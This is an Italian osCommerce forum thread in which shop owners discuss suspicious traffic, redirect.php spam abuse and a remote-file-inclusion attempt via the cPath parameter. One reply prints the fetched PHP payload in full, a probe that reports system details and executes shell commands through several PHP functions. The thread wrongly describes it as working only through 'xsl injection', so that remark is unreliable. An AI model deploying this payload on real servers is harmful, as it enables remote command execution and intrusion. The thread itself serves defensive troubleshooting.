osCommerceITalia

Salve a tutti, ho notato una serie di accessi anomali al sito. Qualcuno sa con certezza di cosa si tratta ? Ho caricato uno screeshot al seguente url :

"http://www.computer-company.it/yescolombia.jpg"

IP 74.6.28.18
OrgName: Inktomi Corporation
OrgID: INKT
Address: 701 First Ave
City: Sunnyvale
StateProv: CA
PostalCode: 94089
Country: US

YAHOO CRAWLER
-------------------
IP 208.36.144.10

OrgName: XO Communications
OrgID: XOXO
Address: Corporate Headquarters
Address: 11111 Sunset Hills Road
City: Reston
StateProv: VA
PostalCode: 20190-5339
Country: US

XO CRAWLER
-----------------

IP 221.143.43.211

inetnum: 221.138.0.0 - 221.143.255.255
netname: HANANET
descr: Hanaro Telecom, Inc.
descr: 726, JangHang-2dong, ILSAN-Gu, Goyang-Si, Kyonggi-Do
country: KR

PROBABILE SPAM SERVER

------------------------


Nulla di preoccupante pero';)...

ciao!

Sta succedendo ancora... mi sembrano dei comandi. Qualcuno sa dirmi cosa cercano di fare ? cercano qualche falla ?

nuovo screenshot :

http://www.computer-company.it/ancora.jpg

..si' e' uno spammer,...

Il problema e' che sta' sfruttando il tuo redirect.php per "ingannare" i siti.

Devi applicare la patch per il redirect,...prova questo:

http://www.oscommerce.com/community/contributions,3676

e magari leggiti questo:

http://programmin.prim8.net/archives/21 ... patch.html

-------------

Per provare se il tutto funziona,...puoi "sfruttare" la stessa istruzione dello spammer e fai cosi':

http://www.NOMEDELTUOSITO.XXX/redirect. ... action=url

Se non usi la root,..prima del REDIRECT.PHP mettici la cartella giusta.

Magari manda anche una mail all'ISP ( 9 su 10 non ti cagano,..pero' tentar non nuoce).

_______________

OrgName: Yipes Communications, Inc.
OrgID: YIPS
Address: 114 Sansome Street
City: San Francisco
StateProv: CA
PostalCode: 94104
Country: US

NetRange: 66.227.0.0 - 66.227.127.255
CIDR: 66.227.0.0/17
NetName: YIPES-BLK5
NetHandle: NET-66-227-0-0-1
Parent: NET-66-0-0-0-0
NetType: Direct Allocation
NameServer: NS1.YIPES.COM
NameServer: NS2.YIPES.COM
Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
RegDate: 2002-01-31
Updated: 2002-10-24

RTechHandle: IY10-ARIN
RTechName: Yipes Communications, Inc.
RTechPhone: 1-877-740-6600
RTechEmail: hostmaster@yipes.com

OrgAbuseHandle: ABUSE21-ARIN
OrgAbuseName: Abuse
OrgAbusePhone: +1-303-785-4450
OrgAbuseEmail: abuse@yipes.com

OrgTechHandle: IY10-ARIN
OrgTechName: Yipes Communications, Inc.
OrgTechPhone: 1-877-740-6600
OrgTechEmail: hostmaster@yipes.com

# ARIN WHOIS database, last updated 2007-09-16 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.

OrgName: Yipes Communications, Inc.
OrgID: YIPS
Address: 114 Sansome Street
City: San Francisco
StateProv: CA
PostalCode: 94104
Country: US
Comment:
RegDate: 2000-04-13
Updated: 2006-04-19

AbuseHandle: ABUSE21-ARIN
AbuseName: Abuse

________________

Facci sapere!!

ciao!

salve, dalle 13 alle 18 un furbo con ip che ho localizzato ad Amsterdam si è divertito a fare acquisti nel mio sito sviluppato su piattaforma osCommerce; caricando a carrello prodotti informatici per oltre 700000 euro, fortuna vuole che il mio sito preveda la login che ovviamente il furbo (secondo lui forse lo è) non ha fatto; segnalo la cosa visto che so che non sono il primo ad aver subito tale attacco, preciso una cosa che forse non è casuale, negli ultimi giorni ricevo visite da un ip localizzato in california, stranamente dopo lo stesso nel giro di 1 ora appare puntuale un ip localizzato ad Amsterdam che carica ogni 40 secondi un prodotto per ore e ore,
IP del FURBO o del software che agisce in automatico:
IP 85.17.211.75 :

Prima di tutto grazie per la dritta... ho applicato la patch e penso che non dovrebbero esserci più problemi in tal senso.
Continuano però ad arrivarmi comandi strani tipo questo :

http://www.miosito.it/?cPath=http://www ... .txt%3f%3f

devo preoccuparmi ?

Si vede che ci provano,...e' un classico,...a me arrivano attacchi in continuazione,...al primo posto l'asia......ecco cosa porta il link che hai messo:

-------------------

<?
$dir = @getcwd();
echo "Mic22<br>";
$OS = @PHP_UNAME();
echo "OSTYPE:$OS<br>";
$free = disk_free_space($dir);

if ($free === FALSE) {$free = 0;}

if ($free < 0) {$free = 0;}
echo "Free:".view_size($free)."<br>";

$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;

function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}

function view_size($size)

{

if (!is_numeric($size)) {return FALSE;}

else

{

if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}

elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}

elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}

else {$size = $size . " B";}

return $size;

}}

exit;
----------------------


Esegue un po' di istruzioni,...( non me ne intendo troppo di PHP ),...pero' l'ho lanciato in locale e mi restituisce questo:

Mic22
OSTYPE:Windows NT PEM-SHOP 5.1 build 2600
Free:23.1 GB

E' una shell in php, o meglio l'accesso ai comandi di shell, funziona solo su siti che sono vulnerabili a injection xsl, praticamente quasi nessuno ormai.

Per sicurezza pero'...

Chiediamo a chi ne sa' di piu', cosa sono quei Get e quella Shell...


Ora controllo bene,...ci aggiorniamo,...

ciao!

Grazie dell'interesse Mario . Fammi sapere se hai qualche novità.
Ciao a presto.